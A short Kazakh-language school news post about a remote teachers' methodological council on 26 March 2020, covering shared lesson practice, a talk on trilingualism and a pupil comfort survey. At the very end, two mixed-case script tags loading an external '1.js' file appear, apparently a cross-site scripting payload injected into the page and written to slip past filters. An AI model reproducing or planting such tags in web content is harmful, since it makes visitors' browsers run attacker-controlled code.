2020 жылғы 26 наурызда қашықтықтан қосылу түрінде ұжым педагогтарының арасында әдістемелік кеңес отырысы өтті. Отырыс барсында бастауыш сынып мұғалімдері М.З.Баймуханова, А.Маней озық тәжірибе таратты, физика пәнінің мұғалімі Р.Б. Фахруденов және информатика пәнінің мұғалімі А.А. Утегенова «Үштілділік – жаңа ұрпақтың бірегейлігіне апаратын жол» тақырыбында баяндама жасады, сонымен қатар математика пәнінің мұғалімі А.Т.Амиржанова және орыс тілі мен әдебиетінің мұғалімі К.К.Дуйсенова өз сабақтарындағы қалыптастырушы бағалауды тиімді ұйымдастыру туралы тәжірибелерімен бөлісті. Отырыс соңында мектеп писхологтары оқушылардың сабақтағы психологиялық жайлылығын анықтау бойынша 4,5,10-сынып оқушыларының арасында өткізілген тест қорытындысын ұсынды.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>